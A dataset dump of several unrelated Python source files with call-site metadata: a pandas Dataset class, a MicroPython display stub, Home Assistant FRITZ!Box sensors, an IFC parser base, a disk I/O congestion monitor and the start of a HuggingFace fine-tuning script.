import pandas as pd import numpy as np from src.si.util.util import label_gen __all__ = ['Dataset'] class Dataset: def __init__(self, X=None, Y=None, xnames: list = None, yname: str = None): """ Tabular Dataset""" if X is None: raise Exception("Trying to instanciate a DataSet without any data") self.X = X self.Y = Y self.xnames = xnames if xnames else label_gen(X.shape[1]) self.yname = yname if yname else 'Y' @classmethod def from_data(cls, filename, sep=",", labeled=True): """Creates a DataSet from a data file. :param filename: The filename :type filename: str :param sep: attributes separator, defaults to "," :type sep: str, optional :return: A DataSet object :rtype: DataSet """ data = np.genfromtxt(filename, delimiter=sep) if labeled: X = data[:, 0:-1] Y = data[:, -1] else: X = data Y = None return cls(X, Y) @classmethod def from_dataframe(cls, df, ylabel=None): """Creates a DataSet from a pandas dataframe. :param df: [description] :type df: [type] :param ylabel: [description], defaults to None :type ylabel: [type], optional :return: [description] :rtype: [type] """ if ylabel and ylabel in df.columns: X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy Y = df.loc[:, ylabel].to_numpy() # xnames = df.columns.tolist().remove(ylabel) yname = ylabel xnames = df.columns.tolist() for name in xnames: if name == yname: xnames.remove(yname) else: X = df.to_numpy() Y = None xnames = df.columns.tolist() yname = None return cls(X, Y, xnames, yname) def __len__(self): """Returns the number of data points.""" return self.X.shape[0] def hasLabel(self): """Returns True if the dataset constains labels (a dependent variable)""" return self.Y is not None def getNumFeatures(self): """Returns the number of features""" return self.X.shape[1] def getNumClasses(self): """Returns the number of label classes or 0 if the dataset has no dependent variable.""" return len(np.unique(self.Y)) if self.hasLabel() else 0 def writeDataset(self, filename, sep=","): """Saves the dataset to a file :param filename: The output file path :type filename: str :param sep: The fields separator, defaults to "," :type sep: str, optional """ fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1))) np.savetxt(filename, fullds, delimiter=sep) def toDataframe(self): """ Converts the dataset into a pandas DataFrame""" if self.hasLabel(): df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname))) else: df = pd.DataFrame(self.X.copy(), columns=self.xnames[:]) return df def getXy(self): return self.X, self.Y def summary(dataset, format='df'): """ Returns the statistics of a dataset(mean, std, max, min) :param dataset: A Dataset object :type dataset: si.data.Dataset :param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df' :type format: str, optional """ if format not in ["df", "dict"]: raise Exception("Invalid format. Choose between 'df' and 'dict'.") if dataset.hasLabel(): data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1))) #data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))]) columns = dataset.xnames[:] + [dataset.yname] else: data = dataset.X columns = dataset.xnames[:] stats = {} if type(dataset.Y[0]) is str: for i in range(data.shape[1]-1): #ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat else: for i in range(data.shape[1]): # ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat # _means = np.mean(data, axis=0) # _vars = np.var(data, axis=0) # _maxs = np.max(data, axis=0) # _mins = np.min(data, axis=0) # stats = {} # for i in range(data.shape[1]): # stat = {"mean": _means[i], # "var": _vars[i], # "max": _maxs[i], # "min": _mins[i] # } # stats[columns[i]] = stat if format == "dict": return stats else: return pd.DataFrame(stats)
[((30, 15, 30, 53), 'numpy.genfromtxt', 'np.genfromtxt', (), '', True, 'import numpy as np\n'), ((95, 8, 95, 51), 'numpy.savetxt', 'np.savetxt', (), '', True, 'import numpy as np\n'), ((169, 15, 169, 34), 'pandas.DataFrame', 'pd.DataFrame', ({(169, 28, 169, 33): 'stats'}, {}), '(stats)', True, 'import pandas as pd\n'), ((16, 44, 16, 65), 'src.si.util.util.label_gen', 'label_gen', ({(16, 54, 16, 64): 'X.shape[1]'}, {}), '(X.shape[1])', False, 'from src.si.util.util import label_gen\n'), ((129, 21, 129, 48), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((130, 20, 130, 46), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((131, 20, 131, 46), 'numpy.max', 'np.max', (), '', True, 'import numpy as np\n'), ((132, 20, 132, 46), 'numpy.min', 'np.min', (), '', True, 'import numpy as np\n'), ((142, 21, 142, 48), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((143, 20, 143, 46), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((144, 20, 144, 46), 'numpy.max', 'np.max', (), '', True, 'import numpy as np\n'), ((145, 20, 145, 46), 'numpy.min', 'np.min', (), '', True, 'import numpy as np\n'), ((83, 19, 83, 36), 'numpy.unique', 'np.unique', ({(83, 29, 83, 35): 'self.Y'}, {}), '(self.Y)', True, 'import numpy as np\n')]
RonaldHiemstra/micropython-stubs
stubs/m5stack_flowui-1_4_0-beta/display.py
d97f879b01f6687baaebef1c7e26a80909c3cff3
""" Module: 'display' on M5 FlowUI v1.4.0-beta """ # MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32') # Stubber: 1.3.1 class TFT: '' BLACK = 0 BLUE = 255 BMP = 2 BOTTOM = -9004 CENTER = -9003 COLOR_BITS16 = 16 COLOR_BITS24 = 24 CYAN = 65535 DARKCYAN = 32896 DARKGREEN = 32768 DARKGREY = 8421504 FONT_7seg = 9 FONT_Comic = 4 FONT_Default = 0 FONT_DefaultSmall = 8 FONT_DejaVu18 = 1 FONT_DejaVu24 = 2 FONT_DejaVu40 = 11 FONT_DejaVu56 = 12 FONT_DejaVu72 = 13 FONT_Minya = 5 FONT_Small = 7 FONT_Tooney = 6 FONT_Ubuntu = 3 GREEN = 65280 GREENYELLOW = 11336748 HSPI = 1 JPG = 1 LANDSCAPE = 1 LANDSCAPE_FLIP = 3 LASTX = 7000 LASTY = 8000 LIGHTGREY = 12632256 M5STACK = 6 MAGENTA = 16515327 MAROON = 8388608 NAVY = 128 OLIVE = 8421376 ORANGE = 16557056 PINK = 16564426 PORTRAIT = 0 PORTRAIT_FLIP = 2 PURPLE = 8388736 RED = 16515072 RIGHT = -9004 VSPI = 2 WHITE = 16579836 YELLOW = 16579584 def arc(): pass def attrib7seg(): pass def backlight(): pass def circle(): pass def clear(): pass def clearwin(): pass def compileFont(): pass def deinit(): pass def drawCircle(): pass def drawLine(): pass def drawPixel(): pass def drawRect(): pass def drawRoundRect(): pass def drawTriangle(): pass def ellipse(): pass def fill(): pass def fillCircle(): pass def fillRect(): pass def fillRoundRect(): pass def fillScreen(): pass def fillTriangle(): pass def font(): pass def fontSize(): pass def getCursor(): pass def get_bg(): pass def get_fg(): pass def hsb2rgb(): pass def image(): pass def init(): pass def line(): pass def lineByAngle(): pass def orient(): pass def pixel(): pass def polygon(): pass def print(): pass def println(): pass def qrcode(): pass def rect(): pass def resetwin(): pass def restorewin(): pass def roundrect(): pass def savewin(): pass def screensize(): pass def setBrightness(): pass def setColor(): pass def setCursor(): pass def setRotation(): pass def setTextColor(): pass def set_bg(): pass def set_fg(): pass def setwin(): pass def text(): pass def textClear(): pass def textWidth(): pass def text_x(): pass def text_y(): pass def tft_deselect(): pass def tft_readcmd(): pass def tft_select(): pass def tft_setspeed(): pass def tft_writecmd(): pass def tft_writecmddata(): pass def triangle(): pass def winsize(): pass
[]
dmoore247/db-migration
dbclient/__init__.py
cc75d491d7dd7e9e24b5a35dd3d1080317b25520
import json, requests, datetime from cron_descriptor import get_description from .dbclient import dbclient from .JobsClient import JobsClient from .ClustersClient import ClustersClient from .WorkspaceClient import WorkspaceClient from .ScimClient import ScimClient from .LibraryClient import LibraryClient from .HiveClient import HiveClient from .parser import *
[]
peerke88/SkinningTools
UI/ControlSlider/__init__.py
db761f569ba179231dc64183ebfca1684429ab96
# -*- coding: utf-8 -*- # SkinWeights command and component editor # Copyright (C) 2018 Trevor van Hoof # Website: http://www.trevorius.com # # pyqt attribute sliders # Copyright (C) 2018 Daniele Niero # Website: http://danieleniero.com/ # # neighbour finding algorythm # Copyright (C) 2018 Jan Pijpers # Website: http://www.janpijpers.com/ # # skinningTools and UI # Copyright (C) 2018 Perry Leijten # Website: http://www.perryleijten.com # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # See http://www.gnu.org/licenses/gpl.html for a copy of the GNU General # Public License. # --------------------------------------------------------------------------------------
[]
EuleMitKeule/core
homeassistant/components/fritz/sensor.py
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
"""AVM FRITZ!Box binary sensors.""" from __future__ import annotations from collections.abc import Callable from dataclasses import dataclass from datetime import datetime, timedelta import logging from typing import Any, Literal from fritzconnection.core.exceptions import ( FritzActionError, FritzActionFailedError, FritzConnectionException, FritzInternalError, FritzServiceError, ) from fritzconnection.lib.fritzstatus import FritzStatus from homeassistant.components.sensor import ( STATE_CLASS_MEASUREMENT, STATE_CLASS_TOTAL_INCREASING, SensorEntity, SensorEntityDescription, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ( DATA_GIGABYTES, DATA_RATE_KILOBITS_PER_SECOND, DATA_RATE_KILOBYTES_PER_SECOND, DEVICE_CLASS_TIMESTAMP, ENTITY_CATEGORY_DIAGNOSTIC, SIGNAL_STRENGTH_DECIBELS, ) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.util.dt import utcnow from .common import FritzBoxBaseEntity, FritzBoxTools from .const import DOMAIN, DSL_CONNECTION, UPTIME_DEVIATION _LOGGER = logging.getLogger(__name__) def _uptime_calculation(seconds_uptime: float, last_value: datetime | None) -> datetime: """Calculate uptime with deviation.""" delta_uptime = utcnow() - timedelta(seconds=seconds_uptime) if ( not last_value or abs((delta_uptime - last_value).total_seconds()) > UPTIME_DEVIATION ): return delta_uptime return last_value def _retrieve_device_uptime_state( status: FritzStatus, last_value: datetime ) -> datetime: """Return uptime from device.""" return _uptime_calculation(status.device_uptime, last_value) def _retrieve_connection_uptime_state( status: FritzStatus, last_value: datetime | None ) -> datetime: """Return uptime from connection.""" return _uptime_calculation(status.connection_uptime, last_value) def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str: """Return external ip from device.""" return status.external_ip # type: ignore[no-any-return] def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload transmission rate.""" return round(status.transmission_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download transmission rate.""" return round(status.transmission_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload max transmission rate.""" return round(status.max_bit_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download max transmission rate.""" return round(status.max_bit_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload total data.""" return round(status.bytes_sent / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return] def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float: """Return download total data.""" return round(status.bytes_received / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_kb_s_sent_state(status: FritzStatus, last_value: str) -> float: """Return upload link rate.""" return round(status.max_linked_bit_rate[0] / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_kb_s_received_state(status: FritzStatus, last_value: str) -> float: """Return download link rate.""" return round(status.max_linked_bit_rate[1] / 1000, 1) # type: ignore[no-any-return] def _retrieve_link_noise_margin_sent_state( status: FritzStatus, last_value: str ) -> float: """Return upload noise margin.""" return status.noise_margin[0] / 10 # type: ignore[no-any-return] def _retrieve_link_noise_margin_received_state( status: FritzStatus, last_value: str ) -> float: """Return download noise margin.""" return status.noise_margin[1] / 10 # type: ignore[no-any-return] def _retrieve_link_attenuation_sent_state( status: FritzStatus, last_value: str ) -> float: """Return upload line attenuation.""" return status.attenuation[0] / 10 # type: ignore[no-any-return] def _retrieve_link_attenuation_received_state( status: FritzStatus, last_value: str ) -> float: """Return download line attenuation.""" return status.attenuation[1] / 10 # type: ignore[no-any-return] @dataclass class FritzRequireKeysMixin: """Fritz sensor data class.""" value_fn: Callable[[FritzStatus, Any], Any] @dataclass class FritzSensorEntityDescription(SensorEntityDescription, FritzRequireKeysMixin): """Describes Fritz sensor entity.""" connection_type: Literal["dsl"] | None = None SENSOR_TYPES: tuple[FritzSensorEntityDescription, ...] = ( FritzSensorEntityDescription( key="external_ip", name="External IP", icon="mdi:earth", value_fn=_retrieve_external_ip_state, ), FritzSensorEntityDescription( key="device_uptime", name="Device Uptime", device_class=DEVICE_CLASS_TIMESTAMP, entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_device_uptime_state, ), FritzSensorEntityDescription( key="connection_uptime", name="Connection Uptime", device_class=DEVICE_CLASS_TIMESTAMP, entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_connection_uptime_state, ), FritzSensorEntityDescription( key="kb_s_sent", name="Upload Throughput", state_class=STATE_CLASS_MEASUREMENT, native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND, icon="mdi:upload", value_fn=_retrieve_kb_s_sent_state, ), FritzSensorEntityDescription( key="kb_s_received", name="Download Throughput", state_class=STATE_CLASS_MEASUREMENT, native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND, icon="mdi:download", value_fn=_retrieve_kb_s_received_state, ), FritzSensorEntityDescription( key="max_kb_s_sent", name="Max Connection Upload Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:upload", entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_max_kb_s_sent_state, ), FritzSensorEntityDescription( key="max_kb_s_received", name="Max Connection Download Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:download", entity_category=ENTITY_CATEGORY_DIAGNOSTIC, value_fn=_retrieve_max_kb_s_received_state, ), FritzSensorEntityDescription( key="gb_sent", name="GB sent", state_class=STATE_CLASS_TOTAL_INCREASING, native_unit_of_measurement=DATA_GIGABYTES, icon="mdi:upload", value_fn=_retrieve_gb_sent_state, ), FritzSensorEntityDescription( key="gb_received", name="GB received", state_class=STATE_CLASS_TOTAL_INCREASING, native_unit_of_measurement=DATA_GIGABYTES, icon="mdi:download", value_fn=_retrieve_gb_received_state, ), FritzSensorEntityDescription( key="link_kb_s_sent", name="Link Upload Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:upload", value_fn=_retrieve_link_kb_s_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_kb_s_received", name="Link Download Throughput", native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND, icon="mdi:download", value_fn=_retrieve_link_kb_s_received_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_noise_margin_sent", name="Link Upload Noise Margin", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:upload", value_fn=_retrieve_link_noise_margin_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_noise_margin_received", name="Link Download Noise Margin", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:download", value_fn=_retrieve_link_noise_margin_received_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_attenuation_sent", name="Link Upload Power Attenuation", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:upload", value_fn=_retrieve_link_attenuation_sent_state, connection_type=DSL_CONNECTION, ), FritzSensorEntityDescription( key="link_attenuation_received", name="Link Download Power Attenuation", native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS, icon="mdi:download", value_fn=_retrieve_link_attenuation_received_state, connection_type=DSL_CONNECTION, ), ) async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up entry.""" _LOGGER.debug("Setting up FRITZ!Box sensors") fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id] if ( not fritzbox_tools.connection or "WANIPConn1" not in fritzbox_tools.connection.services ): # Only routers are supported at the moment return dsl: bool = False try: dslinterface = await hass.async_add_executor_job( fritzbox_tools.connection.call_action, "WANDSLInterfaceConfig:1", "GetInfo", ) dsl = dslinterface["NewEnable"] except ( FritzInternalError, FritzActionError, FritzActionFailedError, FritzServiceError, ): pass entities = [ FritzBoxSensor(fritzbox_tools, entry.title, description) for description in SENSOR_TYPES if dsl or description.connection_type != DSL_CONNECTION ] async_add_entities(entities, True) class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity): """Define FRITZ!Box connectivity class.""" entity_description: FritzSensorEntityDescription def __init__( self, fritzbox_tools: FritzBoxTools, device_friendly_name: str, description: FritzSensorEntityDescription, ) -> None: """Init FRITZ!Box connectivity class.""" self.entity_description = description self._last_device_value: str | None = None self._attr_available = True self._attr_name = f"{device_friendly_name} {description.name}" self._attr_unique_id = f"{fritzbox_tools.unique_id}-{description.key}" super().__init__(fritzbox_tools, device_friendly_name) def update(self) -> None: """Update data.""" _LOGGER.debug("Updating FRITZ!Box sensors") try: status: FritzStatus = self._fritzbox_tools.fritz_status self._attr_available = True except FritzConnectionException: _LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True) self._attr_available = False return self._attr_native_value = ( self._last_device_value ) = self.entity_description.value_fn(status, self._last_device_value)
[((41, 10, 41, 37), 'logging.getLogger', 'logging.getLogger', ({(41, 28, 41, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((46, 19, 46, 27), 'homeassistant.util.dt.utcnow', 'utcnow', ({}, {}), '()', False, 'from homeassistant.util.dt import utcnow\n'), ((46, 30, 46, 63), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n')]
gsimon75/IFC_parser
Ifc/IfcBase.py
f9fbe2afa48795bbb502530bc9ab5c4db842e10f
from Ifc.ClassRegistry import ifc_class, ifc_abstract_class, ifc_fallback_class @ifc_abstract_class class IfcEntity: """ Generic IFC entity, only for subclassing from it """ def __init__(self, rtype, args): """ rtype: Resource type args: Arguments in *reverse* order, so you can just args.pop() from it """ self.rtype = rtype def __str__(self): return self.rtype def __json__(self): return {'rtype': self.rtype} @ifc_fallback_class class IfcGenericEntity(IfcEntity): """ Generic IFC entity: type and args """ def __init__(self, rtype, args): IfcEntity.__init__(self, rtype, args) self.args = args self.args.reverse() def __str__(self): return "Gen<{sup}>{a}".format( sup=IfcEntity.__str__(self), a=self.args) @ifc_class class IfcScalarValue(IfcEntity): def __init__(self, rtype, args): IfcEntity.__init__(self, rtype, args) self.value = args.pop() def __str__(self): return str(self.value) @ifc_class class BOOLEAN(IfcScalarValue): pass @ifc_class class REAL(IfcScalarValue): pass @ifc_class class BINARY(IfcScalarValue): pass @ifc_class class INTEGER(IfcScalarValue): pass @ifc_class class NUMBER(IfcScalarValue): pass @ifc_class class STRING(IfcScalarValue): pass @ifc_class class LOGICAL(IfcScalarValue): pass class Omitted: """ Marked with '*' it states that some supertype had defined that attribute, but in the subtype it is a derived (calculated) value, so it no longer makes sense to explicitely assign value to it. """ # TODO: Haven't tried if it can be handled 'just as expected' def __init__(self): pass def __str__(self): return "<omitted>" def __json__(self): return None # class-level, enough to reference, no need to create multiple instances (doesn't hurt though) omitted = Omitted() class Reference: """ Refers to another entity by its index """ def __init__(self, index): self.index = index def __str__(self): return "<#{idx}>".format(idx=self.index) def __json__(self): return {'ref': self.index} class EnumValue: """ Item from some set of enumerated values. """ def __init__(self, value): self.value = value def __str__(self): return "<.{val}.>".format(val=self.value) def __json__(self): return self.value @ifc_class class STEPHeader(IfcEntity): def __init__(self): IfcEntity.__init__(self, "STEPHeader", []) self.fields = {} def add(self, e): self.fields[e.rtype] = e def __str__(self): return "STEPHeader({f})".format(f=", ".join(map(lambda f: "{n}: {v}".format(n=f[0], v=str(f[1])), self.fields.iteritems()))) # vim: set sw=4 ts=4 et:
[]
xe1gyq/stx-utils
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright (c) 2016 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import logging import os from io_monitor.constants import DOMAIN from io_monitor.utils.data_window import DataCollectionWindow LOG = logging.getLogger(DOMAIN) class DeviceDataCollector(object): # Moving average windows MA_WINDOW_SMA = 0 MA_WINDOW_MED = 1 MA_WINDOW_LAR = 2 # Device status STATUS_NORMAL = "N" STATUS_BUILDING = "B" STATUS_CONGESTED = "L" # Data tracked DATA_IOPS = "iops" DATA_AWAIT = "await" def __init__(self, device_node, data_elements, size_sma, size_med, size_lar): self.node = device_node if os.path.exists('/sys/block/' + self.node + '/dm/name'): self.name = open('/sys/block/' + self.node + '/dm/name', 'r').read().rstrip() else: self.name = self.node self.data_dict = {} self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1} self.timestamp = None self.congestion_status = self.STATUS_NORMAL self.congestion_await_minimal_spike = -1 self.congestion_await_sustained = -1 for element in data_elements: self.data_dict.update({element: [ DataCollectionWindow(size_sma, stuck_data_override=True), DataCollectionWindow(size_med, stuck_data_override=True), DataCollectionWindow(size_lar, stuck_data_override=True)]}) def update_congestion_status(self): # Bail if threshold is not set if self.congestion_await_sustained == -1: return ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) # Set the congestion status based on await moving average if self.congestion_status is self.STATUS_NORMAL: if ma_sma > self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING if self.congestion_status is self.STATUS_BUILDING: if ma_lar > self.congestion_await_sustained: self.congestion_status = self.STATUS_CONGESTED LOG.warn("Node %s (%s) is experiencing high await times." % (self.node, self.name)) elif ma_sma < self.congestion_await_sustained: self.congestion_status = self.STATUS_NORMAL if self.congestion_status is self.STATUS_CONGESTED: if ma_med < self.congestion_await_sustained: self.congestion_status = self.STATUS_BUILDING def update_data(self, ts, element, value): self.timestamp = ts # LOG.debug("%s: e = %s, v= %f" % (self.node, element, value)) for w in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: self.data_dict[element][w].update(value, self.data_caps[element]) def get_latest(self, element): if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][self.MA_WINDOW_SMA].get_latest() def get_average(self, element, window): if window not in [self.MA_WINDOW_SMA, self.MA_WINDOW_MED, self.MA_WINDOW_LAR]: LOG.error("WindowError: invalid window requested = %s" % window) return 0 if element not in self.data_dict: LOG.error("Error: invalid element requested = %s" % element) return 0 return self.data_dict[element][window].get_average() def is_data_stale(self, ts): return not (ts == self.timestamp) def get_congestion_status(self, debug=False): if debug: ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA) ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED) ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR) LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" % (self.node, ma_sma, ma_med, ma_lar, self.congestion_await_sustained)) return self.congestion_status def set_data_caps(self, element, cap): if element in self.data_caps: self.data_caps[element] = cap def set_congestion_thresholds(self, await_minimal_spike, await_sustained_congestion): self.congestion_await_minimal_spike = await_minimal_spike self.congestion_await_sustained = await_sustained_congestion def get_element_windows_avg_list(self, element): return [self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR)] def get_element_windows_avg_string(self, element): return "%s [ %9.2f, %9.2f, %9.2f ]" % ( element, self.get_average(element, self.MA_WINDOW_SMA), self.get_average(element, self.MA_WINDOW_MED), self.get_average(element, self.MA_WINDOW_LAR))
[((14, 6, 14, 31), 'logging.getLogger', 'logging.getLogger', ({(14, 24, 14, 30): 'DOMAIN'}, {}), '(DOMAIN)', False, 'import logging\n'), ((37, 11, 37, 65), 'os.path.exists', 'os.path.exists', ({(37, 26, 37, 64): "('/sys/block/' + self.node + '/dm/name')"}, {}), "('/sys/block/' + self.node + '/dm/name')", False, 'import os\n'), ((53, 16, 53, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((54, 16, 54, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((55, 16, 55, 72), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (), '', False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')]
SoumyaBarikeri/transformers
examples/language-modeling/debias_lm_hps_tune.py
996c6e113404000f50444287aa8a31a174ebd92f
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team. # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, CTRL, BERT, RoBERTa, XLNet). GPT, GPT-2 and CTRL are fine-tuned using a causal language modeling (CLM) loss. BERT and RoBERTa are fine-tuned using a masked language modeling (MLM) loss. XLNet is fine-tuned using a permutation language modeling (PLM) loss. """ import logging import math import os from dataclasses import dataclass, field from typing import Optional import torch from transformers.optimization import AdamW, get_linear_schedule_with_warmup from transformers import ( CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, # LineByLineTextDatasetLabels, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed, ) import ray from ray import tune from transformers.file_utils import is_torch_tpu_available from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from ray.tune.schedulers import PopulationBasedTraining from ray.tune import CLIReporter # if is_wandb_available(): # import wandb ray.shutdown() ray.init(log_to_driver=True, ignore_reinit_error=True) logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": "The model checkpoint for weights initialization. Leave None if you want to train a model from scratch." }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"} ) force_pad_token: bool = field( default=False, metadata={ "help": "Whether to force the addition of a padding token to tokenizer that does not already have one." }, ) debiasing_head: Optional[str] = field( default=None, metadata={"help": "The type of de-biasing head to be used"} ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ train_data_file: Optional[str] = field( default=None, metadata={"help": "The input training data file (a text file)."} ) eval_data_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) line_by_line: bool = field( default=False, metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."}, ) mlm: bool = field( default=False, metadata={"help": "Train with masked-language modeling loss instead of language modeling."} ) mlm_probability: float = field( default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"} ) plm_probability: float = field( default=1 / 6, metadata={ "help": "Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling." }, ) max_span_length: int = field( default=5, metadata={"help": "Maximum length of a span of masked tokens for permutation language modeling."} ) block_size: int = field( default=-1, metadata={ "help": "Optional input sequence length after tokenization." "The training dataset will be truncated in block of this size for training." "Default to the model max input length for single sentence inputs (take into account special tokens)." }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) def get_dataset( args: DataTrainingArguments, tokenizer: PreTrainedTokenizer, evaluate: bool = False, cache_dir: Optional[str] = None, ): file_path = args.eval_data_file if evaluate else args.train_data_file if args.line_by_line: return LineByLineTextDataset(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size) # return 